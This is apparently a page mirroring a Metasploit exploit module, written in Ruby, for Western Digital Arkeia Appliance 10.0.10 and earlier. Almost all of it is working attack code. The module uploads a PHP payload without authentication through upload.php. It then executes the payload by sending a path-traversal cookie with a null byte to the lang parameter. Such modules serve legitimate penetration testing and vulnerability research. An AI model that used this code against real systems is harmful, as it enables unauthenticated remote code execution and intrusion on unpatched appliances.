CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/exploits/unix/webapp/arkeia_upload_exec.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking78include Msf::Exploit::Remote::HttpClient9include Msf::Exploit::FileDropper1011def initialize(info={})12super(update_info(info,13'Name' => "Western Digital Arkeia Remote Code Execution",14'Description' => %q{15This module exploits a vulnerability found in Western Digital Arkeia Appliance16version 10.0.10 and lower. By abusing the upload.php script,17a malicious user can upload arbitrary code to the ApplianceUpdate file in the temp18directory without authentication. Abusing the local file inclusion in the lang19cookie to parse this file results in arbitrary code execution, also without20authentication. The module has been tested successfully on Arkeia 10.0.10. The issues21have been fixed in version 10.1.10.22},23'License' => MSF_LICENSE,24'Author' =>25[26'xistence <xistence[at]0x90.nl>' # Discovery, Metasploit module27],28'References' =>29[30[ 'OSVDB', '97614' ],31[ 'OSVDB', '97615' ],32[ 'EDB', '28330' ]33],34'Platform' => ['php'],35'Arch' => ARCH_PHP,36'Targets' =>37[38['Western Digital Arkeia Appliance 10.0.10', {}]39],40'Privileged' => false,41'DisclosureDate' => '2013-09-16',42'DefaultTarget' => 0))4344register_options(45[46OptString.new('TARGETURI', [true, 'The base path to the Arkeia Appliance', '/'])47])48end4950def uri51return target_uri.path52end5354def check55# Check version56print_status("Trying to detect installed version")5758res = send_request_cgi({59'method' => 'GET',60'uri' => normalize_uri(uri)61})6263if res and res.code == 200 and res.body =~ /v(\d+\.\d+\.\d+)/64version = $165else66return Exploit::CheckCode::Unknown67end6869vprint_status("Version #{version} detected")7071if version > "10.0.10"72return Exploit::CheckCode::Safe73end7475# Check for vulnerable component76vprint_status("Trying to detect the vulnerable component")7778res = send_request_cgi({79'method' => 'GET',80'headers' => { 'Cookie' => "lang=fr" },81'uri' => normalize_uri(uri)82})8384if res and res.code == 200 and res.body =~ /Les versions brutes des messages est affichee ci-dessous/85return Exploit::CheckCode::Appears86end8788return Exploit::CheckCode::Safe89end9091def exploit92payload_name = rand_text_alpha(rand(10) + 5)9394post_data = Rex::MIME::Message.new95post_data.add_part(payload.encoded, "application/octet-stream", nil, "form-data; name=\"UPLOAD\"; filename=\"#{payload_name}\"")96file = post_data.to_s97file.strip!9899print_status("Sending PHP payload which will be uploaded to hardcoded /tmp/ApplianceUpdate")100res = send_request_cgi({101'method' => 'POST',102'uri' => normalize_uri(uri, "scripts", "upload.php"),103'ctype' => "multipart/form-data; boundary=#{post_data.bound}",104'data' => file105})106107# If the server returns 200 we assume we uploaded the malicious108# file successfully109if not res or res.code != 200110fail_with(Failure::None, "#{peer} - File wasn't uploaded, aborting!")111end112113register_files_for_cleanup("/tmp/ApplianceUpdate")114115print_status("Sending LFI payload to execute PHP code in /tmp/ApplianceUpdate")116res = send_request_cgi({117'method' => 'GET',118'headers' => { 'Cookie' => "lang=../../../../../../../../../../../../../../../../tmp/ApplianceUpdate%00en" },119'uri' => normalize_uri(uri)120})121122# If we don't get a 200 when we request our malicious payload, we suspect123# we don't have a shell, either.124if res and res.code != 200125print_error("Unexpected response, probably the exploit failed")126end127128end129end130131132